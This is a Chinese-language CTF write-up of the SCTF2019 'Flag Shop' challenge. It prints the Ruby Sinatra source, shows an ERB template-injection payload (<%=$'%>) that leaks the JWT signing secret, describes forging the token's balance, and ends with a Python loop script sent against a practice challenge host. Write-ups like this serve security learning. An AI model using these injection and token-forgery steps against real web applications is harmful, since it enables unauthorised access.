[SCTF2019]Flag Shop

第一次遇見Ruby我去，以爲是思路題~~~

首先頁面是一個shop類的題

buy flag是購買flag,但是要求你的錢要到1e+27才行，work可以加錢，reset重置。審查頁面元素沒什麼思路，發現robots.txt。

提示了/filebak

require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
require 'jwt'
require 'securerandom'
require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'

FLAGPRICE = 1000000000000000000000000000
ENV["SECRET"] = SecureRandom.hex(64)

configure do
  enable :logging
  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
  file.sync = true
  use Rack::CommonLogger, file
end

get "/" do
  redirect '/shop', 302
end

get "/filebak" do
  content_type :text
  erb IO.binread __FILE__
end

get "/api/auth" do
  payload = { uid: SecureRandom.uuid , jkl: 20}
  auth = JWT.encode payload,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
end

get "/api/info" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})
end

get "/shop" do
  erb :shop
end

get "/work" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  auth = auth[0]
  unless params[:SECRET].nil?
    if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
      puts ENV["FLAG"]
    end
  end

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

  end
end

post "/shop" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  if auth[0]["jkl"] < FLAGPRICE then

    json({title: "error",message: "no enough jkl"})
  else

    auth << {flag: ENV["FLAG"]}
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    json({title: "success",message: "jkl is good thing"})
  end
end


def islogin
  if cookies[:auth].nil? then
    redirect to('/shop')
  end
end

Ruby ERB模板注入可以稍微學習下。

本來沒什麼思路的看大佬blog,Cookie是JWT的，之前做項目本來要用的，後來偷懶沒用。。

發現：

  if params[:do] == "#{params[:name][0,7]} is working" then

    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result

  end
end

這一段存在注入，如果傳入的do參數和name參數一致，會輸出{params[:name][0,7]} working successfully!，ruby裏有預定義變量

$'-最後一次成功匹配右邊的字符串。

構造do=<%=$'%> is working和name=<%=$'%>,記得把裏面內容轉成十六進制

拿到secret

將jkl改成1e+27,反正湊成能買flag的錢就行。然後換上去購買。

我自己腳本寫錯了，我學長幫我寫了個

import requests

i=0
hea="auth=eyJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJkYTQxMTQwNy1mOTU4LTRmOTktOWU0Mi1iZTVlZmRhNTc2ZjIiLCJqa2wiOjIwfQ.YPg24ZW9BpT18ozBDCFjNDg0rirbCRT6USl3zzguZA8"
while(i<=1000000000000000000000000001):
    url = "http://9d28a02d-1d7b-412c-9fe8-cb414a4ff97a.node3.buuoj.cn/work?name=%3c%25%3d%24%27%25%3e&do=%3c%25%3d%24%27%25%3e%20is%20working&SECRET="
    sess = requests.session()
    sess.headers['Cookie']=hea
    res = sess.get(url)
    hea=res.headers['set-cookie']
    print(res.text)
    sess.headers['Cookie'] = hea
    url1="http://9d28a02d-1d7b-412c-9fe8-cb414a4ff97a.node3.buuoj.cn/api/info"
    re=sess.get(url1)
    a1=re.text.split(':')[2][:-1]
    i=int(a1)
    print(a1)
    print(hea)

感謝下曉黑老哥

參考
L
XD_whYe